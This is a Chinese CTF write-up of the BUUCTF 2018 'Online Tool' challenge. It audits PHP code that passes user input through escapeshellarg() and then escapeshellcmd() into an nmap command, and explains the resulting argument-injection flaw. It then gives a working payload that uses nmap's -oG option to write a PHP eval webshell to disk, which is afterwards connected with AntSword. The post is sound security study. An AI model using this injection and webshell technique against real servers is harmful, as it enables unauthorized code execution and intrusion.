[BUUCTF 2018]Online Tool

7 篇文章 0 订阅

题目运用的知识点

  • escapeshellarg()escapeshellcmd()函数的运用
  • 对nmap命令的运用

内容

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

解题

一道代码审计题
从头开始审计
HTTP_X_FORWARDED_FOR是HTTP请求头,用来表示请求端的真实IP。
REMOTE_ADDR是nginx与客户端进行TCP连接过程中,获得的客户端真实地址,无法被伪造。因为建立 TCP 连接需要三次握手,如果伪造了源 IP,无法建立 TCP 连接,更不会有后面的 HTTP 请求。
然后是关键的两个函数escapeshellarg()escapeshellcmd()

主要的问题就是这两个函数同时使用时会出现漏洞

escapeshellarg()把字符串转码为可以在 shell 命令里使用的参数,将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。
escapeshellcmd()对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec()system() 函数,或者 执行操作符 之前进行转义。 反斜线\会在以下字符之前插入:&#;`|*?~<>^()[]{}$\, \x0A 和 \xFF。'"仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。

这里贴一个大佬的链接: 转自PHP escapeshellarg()+escapeshellcmd() 之殇.
传入的参数是:172.17.0.2' -v -d a=1
经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd\以及最后那个不配对儿的引号进行了转义
最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的’没有被转义,与再后面的’配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'

我复现的时候一直复现不出来,用5.3.29版本以后的php会是这样:
在这里插入图片描述
而用5.2.17会变成这样
在这里插入图片描述
贴一下代码

<?php
    $host = $_GET['host'];
    echo $host."<br>";
    $host = escapeshellarg($host);
    echo $host."<br>";
    $host = escapeshellcmd($host);
    echo $host."<br>";
    ?>

按照漏洞最后 escapeshellcmd应该会把参数变成‘1’\\''\'
不过技术太菜没有弄出来,希望有知道的大佬可以讨论一下。

继续解题目,虽然我们没有复现成功,但是我们已经理解了原理,利用这个漏洞来进行注入。题目最后提示了我们用nmap进行扫描,我查找了nmap的命令,可以利用-oG命令,这个命令可以实现将命令和结果写到文件,我们很明显可以利用这个上传一句话马

  • nmap -oG result.txt 将输出写成特殊格式

构造PL ?host=' <?php @eval($_POST["cmd"]);?> -oG 222.php '

上传在这里插入图片描述
直接告诉我们目录了,用蚁剑连接。
在这里插入图片描述
在这里插入图片描述
拿到FLAG

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值